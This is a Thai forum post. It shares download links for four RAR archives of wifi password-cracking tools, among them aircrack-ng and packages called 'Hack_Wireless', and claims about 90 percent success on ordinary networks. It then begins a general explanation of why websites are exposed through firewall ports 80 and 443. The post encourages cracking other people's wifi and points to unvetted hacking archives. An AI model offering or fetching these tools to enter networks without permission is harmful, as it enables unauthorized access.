มีทั้งหมด 4 โปรแกรมนะครับ อยากให้ลองใช้ดูทุกตัว เพราะไฟล์มันเล็ก วิธีใช้ด้านในครับ

ทดลองใช้ค้นหาพาสของ wifi ทั่วไป ได้ประมาน 90 เปอ นะคับ แหะๆ

http://www.duckload.com/download/3162299/aircrack-ng-0_1_.9.3-win.rar

http://www.duckload.com/download/3162391/Hack_Wireless.rar

http://www.duckload.com/download/3162439/HackWireless.rar

http://www.duckload.com/download/3162453/WIRELESS.rar

http://www.duckload.com/download/3162485/_.rar

credit zeed5

ข้อมูลจาก ruk-com.in.th

hack web ของไทย

ทุกวันนี้ คงไม่มีบริษัทใดที่ไม่มี Website เป็นของตัวเอง บางบริษัทอาจจะเช่า Web Hosting อยู่ หรือ บางบริษัทอาจมี Web Site เป็นของตนเองอยู่ในระบบเครือข่ายของบริษัท โดยมีการต่อเชื่อมเครือข่ายของบริษัทด้วย Frame Relay, ADSL หรือ Leased Line เข้ากับระบบเครือข่ายของ ISP ซึ่งส่วนใหญ่ก็จะมีการจัดซื้อ Firewall มาใช้ป้องกันระบบเครือข่ายภายในของบริษัท กับ ระบบอินเทอร์เน็ตจาก ISP และ มีการเปิดให้คนภายนอกสามารถเข้ามาเยี่ยมชม Web Site ได้ โดยเปิด Port TCP 80 http และ Port TCP 443 https ในกรณีที่ใช้โปรโตคอล SSL ในการเข้ารหัสข้อมูลเพื่อเพิ่มความปลอดภัยมากยิ่งขึ้น

       ปัญหาก็คือ ในเมื่อทุกบริษัทต้องเปิดทางให้มีการเข้าชม Web Site ทั้งแบบ Plain text traffic (Port 80) และแบบ Encrypted text traffic (port 443) ทำให้แฮกเกอร์สามารถจู่โจม Web Site ของเราโดยไม่ต้องเจาะผ่าน Firewall เนื่องจากเป็น Port ที่ Firewall มีความจำเป็นต้องเปิดใช้อยู่แล้ว

       ในโลกของ E-Commerce มีอัตราการใช้งาน Web Server ที่เพิ่มขึ้นทุกวัน (ดูข้อมูลจากwww.netcraft.com) และ จากข้อมูลของ UNCTAD http://www.unctad.org พบว่า Web Server ทั่วโลก มีทั้งแบบที่เข้ารหัสด้วย SSL แล้ว และ แบบไม่เข้ารหัสด้วย SSL ก็ยังคงมีใช้กันอยู่
;